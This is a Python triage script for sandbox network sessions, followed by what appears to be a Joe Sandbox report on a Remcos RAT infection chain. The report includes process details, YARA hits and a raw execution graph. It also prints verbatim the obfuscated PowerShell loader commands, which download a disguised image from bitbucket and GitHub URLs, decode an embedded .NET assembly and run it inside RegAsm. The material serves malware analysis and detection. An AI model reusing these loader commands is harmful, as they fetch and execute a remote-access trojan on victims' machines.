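from dataclasses import dataclass

# .NET framework utilities that never originate HTTP on their own and are
# favourite injection hosts (assumed list, extend as needed).
INJECTION_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe",
                   "msbuild.exe", "aspnet_compiler.exe"}
# Public code/object hosting commonly abused for payload staging (assumed list).
STAGING_HOSTS = {"bitbucket.org", "bbuseruploads.s3.amazonaws.com",
                 "raw.githubusercontent.com", "github.com", "pastebin.com"}


@dataclass
class Session:
    pid: int
    process: str        # full image path as the sandbox records it
    dst_ip: str
    dst_port: int
    request: str        # request line + headers, one per line
    response: str = ""  # status line + headers, one per line (may be empty)


def parse_http_block(block: str) -> tuple[str, dict[str, str]]:
    """Split a captured request/response into (first line, lowercase header map)."""
    lines = [ln for ln in block.strip().splitlines() if ln.strip()]
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def triage(s: Session) -> list[str]:
    """Return human-readable findings for one session; an empty list means clean."""
    findings: list[str] = []
    req_line, req = parse_http_block(s.request)
    exe = s.process.rsplit("\\", 1)[-1].lower()
    host = req.get("host", s.dst_ip)
    parts = req_line.split()
    path = parts[1].split("?")[0] if len(parts) > 1 else ""

    if exe in INJECTION_HOSTS:
        findings.append(f"{exe} (pid {s.pid}) initiated HTTP to {host}: "
                        ".NET utility acting as injection host")
    if "user-agent" not in req:
        findings.append(f"{exe} sent no User-Agent to {host}: hand-rolled HTTP client")
    if host == "geoplugin.net" and path == "/json.gp":
        findings.append("geoplugin.net/json.gp lookup: victim geolocation, part of Remcos start-up")
    if exe == "powershell.exe" and host in STAGING_HOSTS:
        findings.append(f"powershell.exe fetched {path} from {host}: payload staging on public hosting")

    if s.response:
        _, resp = parse_http_block(s.response)
        ctype = resp.get("content-type", "").split(";")[0].strip()
        clen = int(resp.get("content-length", "0") or 0)
        if exe == "powershell.exe" and ctype.startswith("image/") and clen > 1_000_000:
            findings.append(f"{clen}-byte {ctype} pulled by PowerShell: oversized 'image', "
                            "candidate carrier for an embedded stage")
        if exe == "powershell.exe" and ctype == "text/plain" and clen > 100_000:
            findings.append(f"{clen}-byte text/plain pulled by PowerShell: "
                            "candidate base64-encoded binary stage")
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Transcribed from the session tables in this report (constructed fixture).
SESSIONS = [
    Session(7436, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "178.237.33.50", 80,
            "GET /json.gp HTTP/1.1\nHost: geoplugin.net\nCache-Control: no-cache",
            "HTTP/1.1 200 OK\ncontent-type: application/json; charset=utf-8\ncontent-length: 960"),
    Session(1812, PS, "185.166.143.48", 443,
            "GET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1\nHost: bitbucket.org\nConnection: Keep-Alive",
            "HTTP/1.1 302 Found\nContent-Type: text/html; charset=utf-8\nContent-Length: 0"),
    Session(1812, PS, "52.217.161.16", 443,
            "GET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg HTTP/1.1\n"
            "Host: bbuseruploads.s3.amazonaws.com\nConnection: Keep-Alive",
            "HTTP/1.1 200 OK\nContent-Type: image/jpeg\nContent-Length: 2578503"),
    Session(1812, PS, "185.199.108.133", 443,
            "GET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1\nHost: raw.githubusercontent.com\nConnection: Keep-Alive",
            "HTTP/1.1 200 OK\nContent-Type: text/plain; charset=utf-8\nContent-Length: 624104"),
]


def triage_all(sessions=SESSIONS) -> list[list[str]]:
    """Findings per session, in input order."""
    return [triage(s) for s in sessions]


if __name__ == "__main__":
    for s, found in zip(SESSIONS, triage_all()):
        print(f"pid {s.pid} -> {s.dst_ip}:{s.dst_port}")
        for f in found:
            print("   ", f)
```

The absence of a User-Agent header in every request is worth noting on its own: the geoplugin request carries only Host and Cache-Control, and the PowerShell downloads only Host and Connection, which is how a hand-written client or a bare WebClient call looks rather than a browser or Windows Update.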


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49789 | 185.199.108.133 | 443 | 1812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 15:05:22 UTC | 121 | OUT | GET /IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txt HTTP/1.1
                                                                                            Host: raw.githubusercontent.com
                                                                                            Connection: Keep-Alive
2024-10-21 15:05:22 UTC | 894 | IN | HTTP/1.1 200 OK
                                                                                            Connection: close
                                                                                            Content-Length: 624104
                                                                                            Cache-Control: max-age=300
                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            ETag: "e2e4cf46e8c93852d459f70b619a5faf0d779c9ca794122c88d51a2b6591d86e"
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Frame-Options: deny
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-GitHub-Request-Id: 39E3:2B4F25:671EB:6F854:67166DB2
                                                                                            Accept-Ranges: bytes
                                                                                            Date: Mon, 21 Oct 2024 15:05:22 GMT
                                                                                            Via: 1.1 varnish
                                                                                            X-Served-By: cache-lga21985-LGA
                                                                                            X-Cache: MISS
                                                                                            X-Cache-Hits: 0
                                                                                            X-Timer: S1729523123.642651,VS0,VE117
                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                            X-Fastly-Request-ID: 3a47513fc721eaf79e4473ff2227f3e57fab192b
                                                                                            Expires: Mon, 21 Oct 2024 15:10:22 GMT
                                                                                            Source-Age: 0

                                                                                            Target ID:1
                                                                                            Start time:11:05:10
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order.vbs"
                                                                                            Imagebase:0x7ff64c410000
                                                                                            File size:170'496 bytes
                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:11:05:11
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##
I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#
I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#GQ#cgBt#G0#c#Bn#Gs#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GI#c#Bh#Hk#awBz#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:05:11
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:11:05:13
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:11:05:22
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                            Imagebase:0x820000
                                                                                            File size:65'440 bytes
                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:11:05:23
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:12
                                                                                            Start time:11:05:32
                                                                                            Start date:21/10/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7403e0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2715783465.00007FFD341E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_7ffd341e0000_powershell.jbxd

Execution Graph

Execution Coverage: 8.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 61
28 API calls 40770->40773 40775 402e00 40770->40775 40777 4026de 22 API calls 40771->40777 40773->40775 40775->40762 40776->40775 40784 433831 40778->40784 40782 40d352 40781->40782 40783 40d328 RegSetValueExA RegCloseKey 40781->40783 40782->40197 40783->40782 40787 4337b2 40784->40787 40786 4087ed 40786->40199 40788 4337c1 40787->40788 40789 4337d5 40787->40789 40790 434256 __dosmaperr 20 API calls 40788->40790 40792 4337c6 __alldvrm __cftof 40789->40792 40793 43d396 11 API calls 2 library calls 40789->40793 40790->40792 40792->40786 40793->40792 40796 413ee7 ___scrt_fastfail 40794->40796 40795 402178 28 API calls 40797 40e94e 40795->40797 40796->40795 40797->40206 40798->40223 41010 4199cf 40799->41010 40801 401593 40802 401598 40801->40802 41022 41c619 40801->41022 40804 402178 28 API calls 40802->40804 40826 4015bb 40802->40826 40806 4015a7 40804->40806 40805 4015ca 41026 4190f7 40805->41026 40808 402178 28 API calls 40806->40808 40810 4015b6 40808->40810 40809 4015d1 40809->40802 41035 41a104 40809->41035 40812 413bcc 79 API calls 40810->40812 40812->40826 40816 401615 40819 402178 28 API calls 40816->40819 40817 40164b 41043 41a0e7 40817->41043 40820 401624 40819->40820 40821 402178 28 API calls 40820->40821 40822 401633 40821->40822 40823 413bcc 79 API calls 40822->40823 40824 401638 40823->40824 41046 415d66 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 40824->41046 40826->40274 40828 4021c9 11 API calls 40827->40828 40829 406bb1 40828->40829 40830 402ba1 28 API calls 40829->40830 40831 406bcd 40830->40831 40832 40206e 28 API calls 40831->40832 40833 406bd5 40832->40833 40833->40274 40835 40e907 WSASetLastError 40834->40835 40836 40e8fd 40834->40836 40835->40274 41159 40e783 29 API calls ___std_exception_copy 40836->41159 40838 40e902 40838->40835 40841 40168c socket 40840->40841 40842 40167f 40840->40842 40844 4016a6 CreateEventW 40841->40844 40845 401688 40841->40845 41160 4016e4 WSAStartup 40842->41160 40844->40274 40845->40274 40846 
401684 40846->40841 40846->40845 40848 401d83 40847->40848 40849 401e08 40847->40849 40850 401d8c 40848->40850 40851 401dde CreateEventA CreateThread 40848->40851 40852 401d9b GetLocalTime 40848->40852 40849->40274 40850->40851 40851->40849 41161 401f6e 40851->41161 40853 414155 28 API calls 40852->40853 40854 401daf 40853->40854 40855 402a6d 28 API calls 40854->40855 40856 401dbf 40855->40856 40857 402178 28 API calls 40856->40857 40858 401dce 40857->40858 40859 413bcc 79 API calls 40858->40859 40860 401dd3 40859->40860 40861 402091 11 API calls 40860->40861 40861->40851 40863 401861 40862->40863 40864 401734 40862->40864 40865 401867 WSAGetLastError 40863->40865 40916 4017c4 40863->40916 40866 401769 40864->40866 40868 402a91 28 API calls 40864->40868 40864->40916 40867 401877 40865->40867 40865->40916 41165 419105 40866->41165 40869 401778 40867->40869 40870 40187c 40867->40870 40873 401755 40868->40873 40876 402178 28 API calls 40869->40876 41186 414e7e 30 API calls 40870->41186 40877 402178 28 API calls 40873->40877 40875 401787 40885 401796 40875->40885 40886 4017cd 40875->40886 40879 4018c6 40876->40879 40880 401764 40877->40880 40878 401886 40881 402a6d 28 API calls 40878->40881 40882 402178 28 API calls 40879->40882 40883 413bcc 79 API calls 40880->40883 40884 401896 40881->40884 40887 4018d5 40882->40887 40883->40866 40888 402178 28 API calls 40884->40888 40891 402178 28 API calls 40885->40891 41173 419e09 57 API calls 40886->41173 40892 413bcc 79 API calls 40887->40892 40890 4018a5 40888->40890 40894 413bcc 79 API calls 40890->40894 40895 4017a5 40891->40895 40892->40916 40893 4017d5 40896 40180a 40893->40896 40897 4017da 40893->40897 40898 4018aa 40894->40898 40899 402178 28 API calls 40895->40899 41174 4192a0 40896->41174 40900 402178 28 API calls 40897->40900 40901 402091 11 API calls 40898->40901 40902 4017b4 40899->40902 40904 4017e9 40900->40904 40901->40916 40905 413bcc 79 API calls 40902->40905 40907 402178 28 API calls 40904->40907 40920 4017b9 
40905->40920 40909 4017f8 40907->40909 40908 40183f CreateEventW CreateEventW 40908->40916 40912 413bcc 79 API calls 40909->40912 40910 402178 28 API calls 40911 401828 40910->40911 40914 402178 28 API calls 40911->40914 40915 4017fd 40912->40915 40917 401837 40914->40917 41185 419552 55 API calls 40915->41185 40916->40274 40919 413bcc 79 API calls 40917->40919 40921 40183c 40919->40921 41184 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 40920->41184 40921->40908 41218 413da2 GlobalMemoryStatusEx 40922->41218 40924 413de1 40924->40274 41219 40df86 40925->41219 40929 437a54 40928->40929 41245 437844 40929->41245 40931 437a75 40931->40274 40933 40d1b1 RegQueryValueExA RegCloseKey 40932->40933 40934 40d1d5 40932->40934 40933->40934 40934->40274 40936 409360 40935->40936 40937 40cf8c 3 API calls 40936->40937 40939 409367 40937->40939 40938 40937f 40938->40274 40939->40938 41249 40cfd6 RegOpenKeyExA 40939->41249 40942 40219f 28 API calls 40941->40942 40943 41421e 40942->40943 40943->40274 40945 4142f4 40944->40945 40946 40219f 28 API calls 40945->40946 40947 414306 40946->40947 40947->40274 40949 437a48 20 API calls 40948->40949 40950 414179 40949->40950 40951 402178 28 API calls 40950->40951 40952 414187 40951->40952 40952->40274 40954 4140c3 GetTickCount 40953->40954 40954->40290 40956 42ec70 ___scrt_fastfail 40955->40956 40957 41407c GetForegroundWindow GetWindowTextW 40956->40957 40958 403509 28 API calls 40957->40958 40959 4140a6 40958->40959 40959->40290 40961 402178 28 API calls 40960->40961 40962 40a7f8 40961->40962 40962->40290 40964 4021c9 11 API calls 40963->40964 40965 4047cd 40964->40965 40966 402ba1 28 API calls 40965->40966 40967 4047ea 40966->40967 40968 40206e 28 API calls 40967->40968 40969 4047f2 40968->40969 40970 40206e 28 API calls 40969->40970 40971 4047fe 40970->40971 40971->40290 40973 4018fa 40972->40973 41252 40214e 40973->41252 40975 40190a 40976 40206e 28 API calls 40975->40976 40977 40193f 40976->40977 40978 401964 
WaitForSingleObject 40977->40978 40979 401944 40977->40979 40980 40197a 40978->40980 40981 401956 send 40979->40981 41258 4194da 40980->41258 40982 40199f 40981->40982 40985 402091 11 API calls 40982->40985 40986 4019a7 40985->40986 40987 402091 11 API calls 40986->40987 40988 4019af 40987->40988 40988->40290 40990 4021c9 11 API calls 40989->40990 40991 401a53 40990->40991 40992 4021c9 11 API calls 40991->40992 40995 401a5c 40992->40995 40993 432316 ___std_exception_copy 21 API calls 40993->40995 40995->40993 40996 40219f 28 API calls 40995->40996 40997 401acd 40995->40997 40998 40209b 28 API calls 40995->40998 41001 402091 11 API calls 40995->41001 41004 40206e 28 API calls 40995->41004 41305 4019ba 40995->41305 41311 401aef 40995->41311 40996->40995 41323 401c4f 98 API calls 40997->41323 40998->40995 41000 401ad4 41002 402091 11 API calls 41000->41002 41001->40995 41003 401add 41002->41003 41005 402091 11 API calls 41003->41005 41004->40995 41006 401ae6 41005->41006 41006->40251 41008->40251 41009->40251 41011 419a08 41010->41011 41016 4199de 41010->41016 41014 4199fc 41011->41014 41049 42bb1c EnterCriticalSection 41011->41049 41013 419a13 41013->41014 41050 42bb26 LeaveCriticalSection 41013->41050 41014->40801 41015 4199e7 41015->40801 41016->41015 41047 42bb08 InitializeCriticalSection 41016->41047 41019 419a24 41019->40801 41020 4199f8 41020->41014 41048 42bb08 InitializeCriticalSection 41020->41048 41023 41c61e 41022->41023 41051 42a8be 41023->41051 41025 41c626 41025->40805 41027 419097 41026->41027 41028 4190a8 41027->41028 41029 4199cf 3 API calls 41027->41029 41030 4190ad 41028->41030 41031 42a8be 21 API calls 41028->41031 41029->41028 41030->40809 41032 4190cb 41031->41032 41033 4190e7 41032->41033 41056 415d66 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41032->41056 41033->40809 41036 41a113 41035->41036 41057 419aea 41036->41057 41038 4015ef 41038->40802 41039 41a137 41038->41039 41040 41a146 41039->41040 41041 419aea 51 API calls 
